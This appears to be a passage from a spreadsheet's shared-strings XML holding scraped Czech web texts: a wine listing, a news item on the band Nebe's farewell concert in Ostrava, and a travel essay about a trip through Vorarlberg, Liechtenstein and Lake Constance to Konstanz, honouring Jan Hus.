  <si>
    <t>Víno Chardonnay 2017, pozdní sběr, Víno Botur</t>
  </si>
  <si>
    <t>Víno Chardonnay 2017, pozdní sběr, Víno Botur 309 Kč Česká republika , oblast Morava , Slovácká podoblast Barva vína je zelenožlutá, vůně je velmi jemná a elegantní, najdeme zde květiny, mandle, smetanu a toust. Chuť je velmi plná, minerální, příjemná a díky ležení na kvasnicích nasládlá a smetanová s elegantní kyselinou a s jemným dotekem akátového sudu. Doporučujeme k rybám, mořským plodům, bílému masu a těstovinám. 86 Autor: MojeLahve.cz</t>
  </si>
  <si>
    <t>2029.9999999999998</t>
  </si>
  <si>
    <t>1930</t>
  </si>
  <si>
    <t>20241001_19_2997671848_8be4b52d0a6c781c925b.html</t>
  </si>
  <si>
    <t>8be4b52d0a6c781c925b</t>
  </si>
  <si>
    <t>Kapela Nebe odehraje v Ostravě poslední koncert</t>
  </si>
  <si>
    <t>Kapela Nebe odehraje v Ostravě poslední koncert V létě příštího roku by havířovská kapela Nebe oslavila dvacáté výročí od svého vzniku. Namísto toho se její členové v přátelském duchu rozhodli pověsit trsátka na hřebík a v symbolický den, 12. prosince tohoto roku, odehrají v ostravském klubu Barrák svůj poslední koncert. Za první (z celkem čtyř studiových alb) Legosvět bylo Nebe v roce 2013 nominováno na Objev roku v anketě Český Slavík. Tyto počáteční krůčky ve světě showbyznysu byly spojeny s Richardem Krajčem z kapely Kryštof. Ten kapele pokřtil první studiový počin, aby ji poté necelé dva roky pomáhal s managementem. Posléze dostal kapelu pod křídla vydavatelství Universal Music a s druhou deskou Nebe dosáhlo velkých úspěchů. Singly Vteřina a Než se rozední ze stejnojmenného alba znamenaly s přílivem fanoušků zároveň koncerty na nejznámějších tuzemských festivalech. „Jsou to nezapomenutelné chvíle, které jsem bohužel ve své paměti nedokázal udržet úplně všechny," vzpomíná frontman Petr Harazin na období, které následovalo. Problémy s alkoholem eskalovaly až do roku 2019, kdy kapela oznámila pauzu a Harazin úspěšně absolvoval tříměsíční protialkoholní léčbu v Psychiatrické nemocnici v Opavě . Po ní se kapela vrátila v plné síle, pro televizi Óčko stvořila a nahrála singl Stromy s řadou hudebních osobností včetně Petra Jandy , aby krátce na to vydala s Přemkem Forejtem svou nejúspěšnější píseň Stella. „Zůstanou po nás písně, jež ovlivnily životní situace, dny a noci spousty lidí. V tom je hudba speciální. Přestože pro nás končí jedna z nejdůležitějších etap našich životů, ty songy už nám nikdo nevezme," dodává Štěpán Petrů . Členové kapely mimo své hudební aktivity úspěšně podnikají. Bubeník Adam Matýsek je pilotem, Štěpán Petrů vede úspěšný Jazz club v rodném Havířově , chystá se vydat sólový projekt a Petr Harazin pokračuje ve spolupráci s několika interprety jako textař. „Cítíme, že jsme došli na konec naší cesty. Máme rodiny a další důležité věci, kterým se věnujeme. Díky tomu jsme se rozhodli udělat ve svých životech takhle radikální změnu," uzavírá Harazin . Na závěrečném prosincovém koncertě vystoupí na pódiu kromě aktuálně aktivní trojice i mnoho bývalých členů. Autor: Martin Caslavsky Autor person Martin Caslavsky</t>
  </si>
  <si>
    <t>658</t>
  </si>
  <si>
    <t>903</t>
  </si>
  <si>
    <t>20241001_2_2998298936_adf895c89059cdd4b92d.html</t>
  </si>
  <si>
    <t>adf895c89059cdd4b92d</t>
  </si>
  <si>
    <t>Pouť do Kostnice aneb cesta je cíl</t>
  </si>
  <si>
    <t>Pouť do Kostnice aneb cesta je cíl 1. 10. 2024 Rozhodli jsme se, že k 609. výročí mučednické smrti Mistra Jana Husa letos vyrazíme autem na jihozápad od našich hranic. Cíl naší cesty byl načasovaný tak, abychom během týdenního putování projeli západorakouskou spolkovou zemí Vorarlberskem , pak objeli Bodamské jezero a přes Lichtenštejnsko a severní Švýcarsko dorazili do jihoněmecké Kostnice. Tam jsme chtěli v sobotu 6. července stanout u Husova kamene (Hussenstein) na břehu Rýna a vzdát zde hold reformátorovi, nebo také kacíři, podle toho, z jakého konce pravdy se člověk na tuto osobnost dívá… Každopádně však středověkému mysliteli, který předběhl svou dobu a vylepšil náš rodný jazyk odstraněním složitých spřežek. Nesmiřitelnému hledači pravdy a vynikajícímu řečníkovi, který silou slova až do své tragické smrti bojoval proti násilí. Jaká ironie osudu i dějin, že jeho mučednická smrt spustila vlnu nepokojů a bouří a mohutně se prohnala střední Evropou , aby pohřbila lucemburskou monarchii a aby v době vrcholící osmanské hrozby způsobila řadu hlubokých vrásek na papežově čele. Podívejte se na kompletní fotogalerii Gotický sálová interiér kostela sv. Mikuláše ve Feldkirchu Uvítání v nejzápadnější rakouské zemi – Vorarlbersku Počesku foneticky „Fórarlbersko“. To pomalu nejde ani vyslovit. Kde se vzal takový krkolomný název druhé nejmenší rakouské spolkové země hned po teritoriu hlavního města Vídně ? Její název lze rozdělit na předložku „vor“ znamenající „před“ a kmen „Arlberg“, kterýžto označuje zcela konkrétní vrcholovou partii zdejších Alp. Nacházíme se tedy v zemi před horou Arlberg , kudy vedla po staletí jediná dopravní spojnice se sousedním Tyrolskem . Její potenciál a strategický význam dokázal plně docenit až nám dobře známý reformátor s císařskou krví – Josef II. Po dlouhá staletí se jednalo vlastně o velmi chudou část rakouského mocnářství s řadou hluboce zakořeněných tradic a zvláštních krojů, které u žen doplňovaly výrazné koruny splétané z květin. Složité podnebí i terén znesnadňovaly pohyb místních i přespolních obyvatel. Kamenitá půda také zrovna zázračně neplodila. I proto zde nenajdete nijak výstavnou historickou architekturu, spíše skromnější příklady umu dávno odešlých generací. Drobnější a výrazově chudší kostelíky. Z nich za vidění stojí nejméně dva. Ten první najdete v nevelkém městečku Rankweil. Jednoduše nejde přehlédnout. Vévodí strmému kopci nad jeho centrem a do dálky budí respekt. Plnil hned tři souběžné role. Duchovní, poutní, ale také obrannou. Když konečně vystoupáte traverzami až k vrcholu kopce a projdete branou, naskytne se vám kromě úchvatného výhledu na velkou část této spolkové země také pohled na samotnou fortifikaci mohutného kostela s hradbami a věžemi. Druhý, neméně zajímavý kostel pak stojí uprostřed velmi pěkného historického města Feldkirch , již na hranicích s Lichtenštejnskem . Halový dóm sv. Mikuláše je nejvýraznější zachovanou pozdně gotickou architekturou této nevelké země, kterou tu po sobě zanechal Hans Sturn, když v roce 1479 dokončil krásně a lehce rozkročenou sálovou prostoru se čtveřicí štíhlých sloupů. Hned nad ním se pak tyčí největší zachovaný vorarlberský hrad. Zachoval se díky tomu, že po dlouhá staletí sloužil nejprve jako sídlo zemských fojtů, aby později „hostil“ krutý žalář nebo vojenská kasárna. Jen díky této účelovosti využití se nám vlastně hrad dochoval. Za prohlídku však stojí i historické jádro města Feldkirchu , které ožívá barevnými trhy a z roztodivných vývěsních štítů zdejších obchodů, restaurací i hotelů jenom přechází zrak… Pokud vás láká historie židovské diaspory, pak nemůžete minout Hohenems, původní sídlo kdysi nejmocnější vorarlberské šlechtické rodiny, která zasáhla do rakouských i lichtenštejnských dějin. Leží jen na dohled od největšího města Dornbirnu, a jen stěží si tohoto příjemného až ospalého městečka nevšimnete. Nad ním se totiž vypíná špičatá skála se zříceninou hradu Alt-Ems, původního rodového sídla Hohenembsů, kteří vymřeli již v roce 1765. Jde asi o jediné místo ve Vorarlbersku , kde žila významnější židovská komunita a lidé si ji tu dodnes připomínají. Důvodem k tomu je zázračně dochovaný areál ghetta se zachovalou barokní synagogou, židovskou školou, ale i rituální lázní – mikví. Ghetto má řadu malebných zákoutí a tu a tam je osvěží i příjemné kavárny. V jedné z vil židovských podnikatelů Rosenthalů můžete vstoupit do Židovského muzea s řadou exponátů a nadmíru příjemnou kavárnou umístěnou na terase přilehlé zahrady. Ghetto se táhne značnou částí historického jádra až k renesanční perle městečka – rodovému zámku Hohenems s částečně otevřeným arkádovým nádvořím z roku 1567. Stojí hned pod skalou, na níže se tyčí jeho zřícený předchůdce. Je až kupodivu, že se takto konceptuálně otevřená architektura, určená do zcela jiných podnebných podmínek, objevila právě zde. Jeho stavba trvala zatoulanému italskému architektovi Martinu Longhimu pouhých pět let, což je s ohledem na jeho značné rozměry vlastně zázrak. Jaké to štěstí pro německou kulturu, že v roce 1755 navíc do jeho bohaté zámecké knihovny dorazil Franz von Wocher, který tu mezi rukopisy objevil nesmírně historicky cenné Písně o Nibelunzích, pocházející už z roku 1220. Ty dodnes před zámkem připomíná kašna Nibelungů s mozaikou na svém dně. Srovnáme-li nepočetné historické památky a přírodní dědictví, musím přiznat, že se příroda ve Vorarlbersku opravdu náležitě vyřádila. Mohutnou kulisu nádherných alpských velikánů prokládají široká údolí divokých řek. Voda si našla cestu i oslabenou sádrovcovou horninou, a tak místy stvořila nádherné soutěsky. Hned za branami největšího vorarlberského města Dornbirn jsou dvě takové přírodní perly k vidění. Vede k nim poměrně nenáročná trasa, sice okořeněná několika stoupáními s řadou schodů, ale vcelku zvládnutelná i pro netrénovaná těla. Nejprve překonáte řeku, abyste se rázem ocitli v soutěsce Rappenloch. Zdejší vodní divadlo opravdu zaujme kaskádami vodopádů, ačkoliv jsou zčásti spoutané lidskými zásahy pro výrobu elektřiny. Kolem bývalého mlýna s přehradním jezírkem a dodnes funkční, více než stoletou vodní turbínou projdete výš až k návazné soutěsce Alploch. Ta má odzbrojující génius loci. Člověk do jejího chodu vůbec nezasáhl. Ze stran vás sevřou přibližující se svislé skalní stěny, které dosahují nejméně padesátimetrové výšky. Jsou různě zprohýbané a po jejich bocích se plazí visutá dřevěná stezka s řadou mostků nad tokem dravé říčky, kterou slyšíte pod nohama. Voda je tu všudypřítomná. Padá seshora i zezdola, v kapičkách, ale i pramíncích, místy proměněná snad až ve vodní páru. V jinak parném létě vás tu sevře nevtíravá zima, takže se vyplatí přece jen trochu obléci. Nepromokavé oblečení i obutí jsou tu výhodou. Každá zatáčka přinese jinak originální průhledy, tu a tam se na vás náhle vyřítí vodopád. Konečně se skály rozestoupí do širšího údolí, které matka příroda nevybudovala z tak odolného horninového materiálu, a tak tu už po dně svědecky leží jen několik obrovských balvanů. Síla vody je opravdu nezměrná a stojí jí za to poznat z důvěrné blízkosti. Člověk si tak určitě získá větší respekt k tomuto živlu, který po věky pomáhá, vyrábí elektřinu, hasí žízeň, ale i ubližuje, topí a boří. Ostatně nedávné povodně v Opavě či Krnově nás o tom nepochybně přesvědčily. Břežnická zastavení Nikdo z nás nevěděl, jakému to Břežnice vlastně odpovídá názvu rakouského města. Ano, jde opravdu o Bregenz , samotné hlavní město Vorarlberska . Tak nám to alespoň vysvětlila navigace v autě. Je to zvláštní, že takové moderní zařízení, jakým je digitální a satelitně řízená navigace, používá poměrně českého ekvivalentu z dob takřka dřevních. Horní město v Bregenzu je mimořádně autenticky dochováno ve středověké podobě Ale podívejme se blíže na toto zajímavé město! Žije tu sice pouhých 30 tisíc obyvatel, jeho rysy však ukazují na něco víc než jen okresní město. Člení se do dvou nesourodých částí – středověkého Horního města, které vyrůstá na návrší nad našimi hlavami, a Dolního města , která se jako půlměsíc ovíjí kolem východních břehů Bodamského jezera. Snad si ani nelze představit dva odlišnější urbanistické světy. Na jedné straně v hradbách sevřené úzké uličky Horního města s řadou neomítaných věží a bašt, barevnými okenicemi i nízkými podloubími, kam zavítá opravdu jen málokdo. Na druhé straně široká náměstí a velkorysé promenády kolem vod jezera Dolního města, které jsou doslova obleženy davy relaxujících obyvatel, nakupujícími vynikající jogurtovou zmrzlinu různých chutí i barev nebo čekajícími na vytouženou plavbu po širých zvlněných vodách jezera, jehož konce není snadné dohlédnout. Veškerý společenský i kulturní život je soustředěn právě sem. Město tu dýchá staletými platany ve velkoryse založených parcích a do vod jezera utíká několik dlouhých mol. Směrem k jihu pak nalézáme největší pozoruhodnost celého města. Přímo na jezerní hladině je i letos umístěno operní pódium. Kulisy jsou to opravdu nádherné. V dnešním ponurém počasí s řadou krátkých spršek vydatných deštíků se přímo z vody noří částečně zničené dřevěné venkovské domky se spálenými stromy a kostrou koně, která má táhnout převržený čtyřkolák. Potemnělý svět nám něco v neurčitých rysech připomíná. Ano, jsou to Čechy v době ničivé třicetileté války. A opravdu to není náhoda, protože napříště se v nich hraje opera Čarostřelec od Carla Marii von Webera , jejíž děj se, světe div se, odehrává v šumavské vesničce! Nejširší nabídku průvodců a map Německa (turistických, cyklistických, horolezeckých a jiných) najdete v prodejně a na eshopu KnihyNaHory.cz A jestli Dolní město něčím nešetří, tak to je moderní architektura. Je to zvláštní propojení mezi původní historickými měšťanskými domy, radnicí a kostely, a supermoderními výstřelky současné architektury umělců zvučných jmen, jako je Hans Hollein nebo Jean Nouvel . A tak hltáme porce až kosmicky působící moderny v budově opery nebo Vorarlberského muzea z roku 2012, z jehož unikátního okna je nádherný panoramatický výhled na Bodamské jezero s přístavem. Okno v plném rozsahu otevírá jednu ze stěn rozlehlé místnosti. Muzeum stojí za vidění. Uvnitř zaujmou už jen umně zpracované prostory geometrického atria s hrou světla a stínů. Právě na jeho dně si člověk přijde neuvěřitelně titěrný. Ty prostory jednoduše vizuálně působí! Ani expozice neunavují. Tak trochu si s nimi návštěvník hraje, mnohde si však ony hrají s ním. Jako v jedné z místností, která ukazuje tradici dechové muziky této malé alpské země. Na jejím konci se na pruhy látky promítá proti vám pochodující kapela. Až hrozivě se k vám blíží, hudba zesiluje a od vás se čeká, že půjdete dál, vstříc tradiční kapele krojovaných mužů a skrze ony pruhy prostoupíte do další místnosti s expozicí dechových hudebních nástrojů… jen málokdo se odváží tuto zkoušku podstoupit a raději se vrací zpět, aby je kustod poslal zpět, v ústrety jen zdánlivému nebezpečí. Život je hra a hravá je celá tato budova od architektů Cukrowicze a Nachbaur-Sturma. Spojuje staré a nové, zkouší zvědavé návštěvníky a překvapuje. Přitom zvenku jen velká bílá kostka s malými výstupky budícími dojem Braillova slepeckého písma… Plachetnice na Bodamském jezeře ze švýcarských břehů Hlavně neminout trpasličí Lichtenštejnsko ! Dnes se nám bohužel kaboní počasí, a tak se nám alpští velikáni schovávají do husté mlhy a my vidíme jen jejich rozložité spodní části. Nebem se jako cáry táhnou protáhlé, švestkově tmavé mraky. A my hledáme hranici mezi Rakouskem a titěrným Lichtenštejnskem . Hlavně ji neminout, protože země je to opravdu malinká. Silnice se stále více a více zužují, jako by nám chtěli naznačit, že za chvíli vjedeme do země velehor, ovšem rozkládající se na ploše pouhých 160 km 2. Zdejších 40 tisíc lidí se tu povětšinou tísní v západním předhůří Alp mezi Rýnem, za kterým už leží Švýcarsko , a kdesi v netušených nadmořských výškách probíhá nijak neznatelná horská hranice z kdysi mateřským Rakouskem . Právě od něj se tato čtvrtá nejmenší evropská zemička za dodnes vládnoucích knížat z Lichtenštejna odrodila a vůči němu se také chtěla odlišovat. Proto se snažila a pořád snaží prorůst se sousedním Švýcarskem , jehož přítomnost ho chrání před dějinnými zvraty a hospodářským neúspěchem. Platí se tu švýcarskými franky a obě země spojuje náramná drahota spojená s rovněž sdílenou vysokou životní úrovní. Připravte se, že tu v nijak luxusních restauracích zanecháte třeba za oběd nemalé peníze, běžně i v řádech tisíců, zvláště je-li vás více… Však místní neváhají a za nákupy, kulturou i službami míří právě do sousedního Vorarlberska . Jimi zesilovaná poptávka však zvedá ceny i u sousedů. A tak je expedice v této části Evropy vlastně také dobrou příležitostí vydatného vyvětrání vašich peněženek a bankovních účtů… Přesto se tu alespoň na jeden den zastavte. Zajděte buď do nitra Alp v Malbunu , kam s oblibou zajížděli zamilovaní Charles s Dianou. Vede tam opravdu velmi klikatá silnice s několika tunely. Je docela příjemné tu řídit, protože člověk se tu za volantem opravdu nenudí a průběžné výhledy do sytě zelené a horsky dramatické krajiny jednoduše stojí za to. Až pak budete sjíždět zpátky k Rýnu , určitě si v obci Triesen všimněte malého, leč velmi starého kostelíka sv. Mamerta. Zdejší kaple bývala kdysi součástí hradu, z něhož dodnes nic nezbylo. I když vypadá jako splácaná z hlíny, svým vznikem atakuje 9. století! Anebo tradičně navštivte hlavní obec, nikoliv město, Vaduz . I když má znak, nebyl Vaduz knížaty ani dnes povýšen na město, a tak celé Lichtenštejnsko zcela oprávněně budí dojem jedné velké vesnice. Knížata tu sídlí na nejvýznamnější historické památce země – gotickém hradě s pozdějšími zámeckými úpravami. Ale až od roku 1938, protože teprve tehdy musel František Josef II. z Lichtenštejna opustit původní hlavní rodové sídlo, pohodlný zámek Valtice na jižní Moravě . A tak se nám na naší expedici poněkolikáté propojují zdejší dějiny směrem ku Praze … Hrad je vidět prakticky z celé země, protože zaujímá dominantní polohu nad Vaduzem , síla jeho zdí dosahuje až úctyhodných čtyřech metrů! Leč bohužel je veřejnosti nepřístupný, a tak když k němu vyšplháte, nezbývá vám nic jiného, než udělat pár snímků. Knížata holt nemají kam jinam jít, a ani nikdo z nás by asi svůj domov neotvíral kdekomu, aby se podíval… Sídlo lichtenštejnské pětičlenné vlády Procházku pěší zónou Städtle v samotném jádru Vaduzu si nenechte ujít. Není to nijak náročný výkon, který vám představí nejvýznamnější objekty ve městě, stejně jako v sousedním Vorarlbersku hodně stavící na provazování starého a opravdu nového. Snad nejlépe je to vidět na veřejných prostranstvích, doslova obsypaných nejrůznějšími moderními sochami, mezi kterými nechybí ani jedno z děl Davida Černého . Místo je však oblíbené českými cestovními kancelářemi, takže necelých sedm hodin cesty sem autokarem láká řadu českých rodin. Těmi se to v centru jenom hemží, řízky v rukách a spousta rozverných dětí s předraženou zmrzlinou. Jaký to hezký český kontrast! Importovaný vepřový řízek za nulu versus místní zmrzlina za 300 Kč za kopeček… Jestli tu ale něco stojí za vidění, tak je to dvojice supermoderních budov muzeí moderního umění, zvaných Černá a Bílá kostka. Evidentně podle barvy kamenem obložených fasád. Interiérové expozice nás však trochu zklamaly, snad i pro všudypřítomnou abstrakci a přepjatou snahou udělat z každé prostorové instalace moderní umění, třeba i z narovnaných pytlů s pískem nebo rozházených hraček… O poznání zajímavěji působí slavná Klenotnice (Schatzkammer) v budově Poštovního muzea (Postmuseum), kde alespoň trochu nahlédnete do jedné z největších světových sbírek umění patřící knížecí rodině, v podstatném rozsahu však běžně nepřístupné. Obzvláště velkým tahákem je tu replika zlatého lichtenštejnského knížecího klobouku, jehož originál se nenávratně ztratil. Opodál směrem k zemské katedrále sv. Florina nelze jen tak minout moderní objekt zemského sněmu, který má 25 poslanců. Za jeho velikost by se ovšem nemusel stydět ani parlament mnohem početnější. Tak naddimenzovaně totiž tato světle okrová budova čistých tvarů působí. Jakoby kontrastem se v jejím těsném sousedství vypíná historizující budova vlády se zkosenými nárožími a vysokou prejzovou střechou. Zdejší kabinet má jen pět členů, a tak tu všechno vyvolává takový kapesní dojem. Tím rozložitěji však vypadají rozlehlé budovy Lichtenštejnské zemské banky, které dávají tušit, odkud se bere podstatná část nadprůměrně vysokého hrubého domácího produktu. Z ostatních partií Lichtenštejnska , které není těžké pro jeho nevelké rozměry minout, oku zalahodí zříceniny horního hradu Schellenberg na severu země, kde jsme byli sami. Snad jen kromě jedné mourovaté kočky, která se nám pochlubila ulovenou kořistí… Impozantní trosky kamenného sídla upomínají na dobu před Lichtenštejny, kteří se tu zakoupili až na sklonku osmnáctého století. Před nimi tu ještě bydlela hrabata z Hohenembsu, pocházející ze sousedního Vorarlberska . Ta také známe z Čech , protože jim patřil zámek v Bystrém u Poličky. Nejinak tomu bylo i u dalšího, tentokráte zachovaného hradu Gutenberg, který se tyčí na výrazném kopci obtočeném vinohrady nad obcí Balzers v jihozápadním cípu této zemičky. Ten se dochoval jen díky jednomu velkému nadšenci, výstřednímu umělci, malíři a sochaři, jenž chtěl vlastnit hrad. Sen se Egonu Rheinbergerovi splnil, musel však investovat poměrně velké peníze, aby hradu za pouhých sedm let do roku 1912 vrátil jeho tvář a obytnou funkci. Myslím, že se mu to opravdu povedlo a k pohlednému sídlu se dá vypravit, byť vás nakonec zastaví hradba vnitřního hradu. Ten totiž není přístupný, a tak prozatím pevně odolává vnějšímu světu a turismu, jenž nicméně ani v této části Lichtenštejnska nijak extrémně nebují. Což my třeba vítáme. Nejstarší lichtenštejnský kostelík sv. Mamerta v Triesenu Na švýcarském břehu Bodamského jezera Abychom se dobrali cíle naší cesty, tedy jihoněmecké Kostnice, největšího města na Bodamském jezeře ( Bodensee ), musíme ještě zdolat jižní břeh jezera, třetího největšího ve střední Evropě , které ovšem nejen Angličané znají pod názvem Kostnické jezero (Lake Constance). Překvapuje nás vysoká, vzdutá hladina jezerních vod. Nábřežní promenády ve všech městech na břehu jsou povážlivě zčásti zatopeny. Vítr si pohrává s hladinou a přístavy bičují poměrně velké vlny. Lodní doprava po jezeře také jenom kvete. Loď střídá loď. Křížem krážem jezerem, nehledě na nejasně vytyčené hranice mezi třemi německy mluvícími státy – ze severu a západu Německem , z východu Rakouskem a z jihu právě Švýcarskem . Vyhloubil ho kdysi dávno rýnský ledovec a rovnou rozdělil do dvou částí. My se pouštíme objet jeho větší část, která se nazývá Horní jezerem (Obersee). Z Lichtenštejnska prakticky stále sestupujeme směrem dolů. Zatáčkami se silnice jen hemží. Místní jezdí naprosto bezpečně. Už jen proto, že by asi nechtěli bourat početnou flotilu aut typu Ferrari a Porsche. Tyto značky jsou tu běžné jako u nás škodovky. Svědčí o opravdu vysoké úrovni. V zásadě kdejaký švýcarský důchodce na takové auto se svými příjmy dosáhne. Zastavujeme v pobřežním městě Staad. Kvůli Hundertwasserovu zázraku, jímž je místní tržnice Altenrhein. Jeden z posledních projektů rakouského architekta, který vlastně celý život zůstal sochařem a zahradníkem, je umístěna trochu stranou centra. Stojí ale opravdu za to. Místo oken jsou tu pečlivě srovnány láhve od vína . Ty jen spoře pouštějí podivné nazelenalé světlo dovnitř. Jediná podlaha není rovná. Natož zdi. Vinou se v různých křivkách, ohýbají se a zase rovnají. Střídají se na nich materiály. Tu a tam režné zdivo, pak zase chvíli oblázky, omítky s keramickými obklady a mozaikami. Budova není příliš vysoká a její střechu tvoří jedna velká zahrada s typickými zlatými báněmi malých válcových věží. Zahradami se honí spousta dětí. Rodiče a prarodiče na ně marně volají, protože tu mají svůj soukromý ráj. Přirozené schovávačky, spoustu zajímavých květin a nádherný výhled na blízké jezero. Odtud je to jen malý kousek do klimatických lázní v Rorschachu . Pokračujeme totiž směrem na západ a toto městečko nás vítá úpravnými zahradami s otevřenou přírodní promenádou na samém břehu jezera. Impozantním symbolem města je barokní sýpka, která doslova plave po jezerní hladině. Uvnitř je městské muzeum a v jejím sousedství již vyrůstá zajímavý objekt meziválečné městské plovárny. Dřevostavba na betonových pilířích obklopuje vnitřní prostor s kabinkami a bazénem, vystřiženým přímo z hladiny jezera. Dneska se tu už ale nikdo nekoupe. Místní sem raději zajdou na dobré jídlo, které se servíruje v takto zvláštním prostředí obklopeném vodou. Procházka městem vyjde jen na pár minut a povětšinou míří ke kostelu zdejšího věrozvěsta sv. Kolumbána . On a jeho irský druh svatý Havel právě zde, na březích Bodamského jezera, neúnavně šířili křesťanství. Právě svatý Havel nás následně provází přes metropoli kantonu St. Gallen až do Arbonu , kde se až do dnešních dnů zachovala jeho skromná poustevna. St. Gallen je zvláštní město. Jméno podědil právě po svatém Havlovi a jeho půdorys se zcela netradičně obtáčí kolem obrovitého areálu prastarého kláštera benediktinů, který tu postavili již v roce 719 n. l. jako úctyhodný soubor čtyř desítek budov různého určení. Každá ulička právě kvůli této monumentální stavbě ráda změní směr. Důstojnost klášterního areálu zvyšuje a podtrhuje rozměrný klášterní chrám s rokokovým průčelím s dvojicí převysokých věží. Jeho útroby připomínají nádraží. Vysokánská klenba je laděna do zelených tónů. Stropy pokrývají fresky s duchovní tématikou a katolickou zdobnost završuje rozkošatělý oltář s mohutným zlacením. Kolem dokola, kam se jen oko podívá, samé zpovědnice, mnohé s pěkně vyřezávanou výzdobou. V přilehlém klášteře za vidění stojí jednak unikátně dochovaná barokní knihovna s řadou cenných rukopisů, které pocházejí také z 6. století, z doby úsvitu křesťanství v Irsku i z jiných raně středověkých míst. Právem je celek zapsán na seznam kulturního dědictví UNESCO. Druhou zajímavost si nenechte ujít v klášterním muzeu. Ačkoliv je velmi malé, jeho prohlídka končí naprostou senzací. Vstoupíte do malé trezorové místnosti, kterou za vámi hermeticky uzavřou. A čekáte. Nad dveřmi se odpočítává čas k nule. Jakmile dosáhne této hodnoty, světlo zhasne a na nenápadné plátno začnou padat první paprsky filmového dokumentu k historii kláštera. Vše se točí kolem jediného původního pergamenu, na němž kdosi nakreslil, jak má budoucí klášter vypadat. Jsme v devátém století a připadá nám neuvěřitelné, že stačila jediná kresba, aby vznikl tak dokonalý areál s hospodářstvími, pěti zahradami a vším potřebným pro mnišský život. Poté, co poznáme každodenní život v klášteře, světlo potemní a hluboký mužský hlas nám oznámí, že na pouhých dvacet sekund spatříme onen půdorysný pergamen, jediný list stavební dokumentace, který by už dnes stavebním úřadům zdaleka nestačil… Uprostřed místnosti se zvedá svítící poklop naznačeného sarkofágu. Pod ním zeje díra s velkým lejstrem, které leželo po staletí složené v jakousi malou mapu, z druhé strany později znovu popsanou některou ze středověkých legend. Odzbrojující pocit. Vysekáváme poklonu švýcarskému muzejnictví, které míří přímo na branku a zapojí přitom všechny lidské smysly, napětí, přirozenou zvědavost i emoce… Jak v Rorschachu , tak především v St. Gallenu narážíme na takovou místní zvláštnost. Uličky původně středověkých měst jsou jakoby zúžené a ve vyšších podlažích do nich ústí větší i menší arkýře. Stavebně i řemeslně zpracované vystupující části zdiva čelních fasád domů se předbíhají ve velikosti, barevném provedení i celkové zdobnosti. Ty nejkrásnější z nich jsou ale zároveň vynikajícími řezbářskými skvosty s řadou lidských i zvířecích figur, velryb, velbloudů, slonů, psů i různých bájných tvorů. Přehlídka renesančního a barokního umění připomíná venkovní galerii. Stačí se jen dívat a vnímat tu krásu. Bohatí obchodníci tyto ozdoby vlastních domů koncipovali ovšem zcela záměrně. Protože jak jinak dát najevo své bohatství? Čím krásnější a zdobnější arkýř, tím bohatší majitel. A čím bohatší, tím váženější a vlivnější. Tak to tehdy bývalo a možná, že to tak zůstalo i dnes, protože udržovat takový dům jistě nebude žádná legrace… Kostnické vzpomínky na minulost – v mučednickém cíli poutě Ubytováváme se v hotelu Stará pošta (Alte Post) při hlavním kostnickém náměstí. Jsme sice nejprve unaveni a těšíme se, až si uděláme pohodlí na pokoji, nicméně naši pozornost si zaslouží jeden naprosto unikátní moment přivítání. Je 5. července a dnes mají svátek věrozvěsti, tedy nositelé křesťanské víry do našich vod a strání, hned zítra je vystřídá svátek dne upálení Mistra Jana Husa , tedy jednoho z otců reformátorů starých dogmat a pořádků zhýralé katolické církve. Ostatně jsme tady kvůli němu, protože letos to vychází na 609. výročí jeho mučednické smrti. Jen o rok více, než postihla obdobně krutá smrt jeho druha a podporovatele Jeronýma Pražského , údajně na stejném místě na břehu Rýna . Oba měli prý zemřít v mimořádných bolestech, při plném vědomí, když jejich nebohá těla postupně stravovaly plameny hranic narovnaných až po jejich brady, aby se nemohli před bolestí vykoupit milosrdným udušením… O to paradoxnější nám připadl zvláštní prezent, který si přichystali provozovatelé našeho hotelu pro přijíždějící hosty. V hezké kulaté skleněné mističce mají jinde srovnané bonbóny nebo čokolády. Úhledně srovnané papírové krabičky přikrmovaly naši rostoucí zvědavost, a tak jsme se konečně osmělili a jednu z nich jsme otevřeli. Jaké bylo naše překvapení, když jsme zjistili, že jsou to zápalky… V Kostnici? V hotelu? Sirky? Koho to napadlo. Snažíme se to nějak vstřebat, pochopitelně s odstupem, takže to bereme jako takovou zvláštní připomínku Husova upálení… Ono to vlastně v té Kostnici je ohledně Mistra Jana vlastně všechno trochu jinak. Dnešní Husův dům sloužící jako kazatelův památník nikdy mistra nehostil. Dům, kde bydlel, se jmenoval U Červené konve a ten již ve svých gotických rozměrech nestojí, protože jej v 16. století nahradila novostavba pozdně renesančního měšťanského domu. Ten ovšem nese alespoň název svého předchůdce a českého kazatele tu připomíná pamětní deska. Obdobně je to i s Husovou smrtí. Na místě, kde měla údajně stát jeho úmrtní hranice, je umístěn obrovský balvan, který připomíná nejen úmrtí Husovo, ale i Jeronýma Pražského . Leží v poklidné čtvrti na křižovatce mezi bytovými domy. Zjevně tedy hranice vzplála, byla-li tedy opravdu postavena tady, mimo okruh městských hradeb, vlastně nedaleko od poměrně dravých vod Jezerního Rýna (Seerhein) spojujícího obě části Bodamského jezera. Právě sem měl být také vržen mučedníkův popel. Kostnice měla za druhé světové války štěstí, že leží přímo na hranici se sousedním švýcarským městem Kreuzlingen . Poloha ji zachránila před spojeneckým bombardováním, a tak i dnes můžeme obdivovat řadu dochovaných historických staveb. Takové štěstí jiná německá města neměla. Když se však procházíte kostnickými úzkými uličkami s řadou úzkých a různě pokřivených hrázděných domů, padá na vás takový zvláštní pocit morbidní představy kulis středověkého města, které plné čtyři roky hostilo slavný kostnický koncil, „okořeněný“ na jednu stranu obžerskými hostinami ve zdejších krčmách a prostopášnými radovánkami s kurtizánami. Těch se ve městě mělo postupně vystřídat kolem osmi stovek a na jejich „počest“ tu sochař Peter Lenz nedávno vztyčil přímo na hladině Bodamského jezera sochu Impérie, otáčivé postavy spoře oblečené lepé děvy. Na druhou stranu tu druhý a třetí rok jednání církevní představitelé „proložili“ takovými menšími popravami českých heretiků. Stísněně působí jak budova samotného koncilu, tak především vysokánská klenba Münsteru , kostnické katedrály, jejíž neogoticky upravená věž se hrne k nebi. Právě tady byly vyhlášeny odsuzující rozsudky nad oběma českými nebožáky. Poněkud nenápadně zato působí nejstarší divadelní budova v Německu ze samotného počátku sedmnáctého století. Do zamýšlené, ale nedokončené jezuitské koleje se v roce 1609 nastěhovala divadelní společnost. A německé prvenství bylo na světě, byť tak trochu vlastně náhodné. Švédská výspa v německých vodách Bodamského jezera – květinový ostrov Mainau Od domova nás dělí necelých tisíc kilometrů. Volíme tedy ještě krátkou zastávku u druhého největšího ostrova z celkem třinácti na Bodamském jezeře. Je jím Mainau. Říkají mu Květinový ostrov a mají k 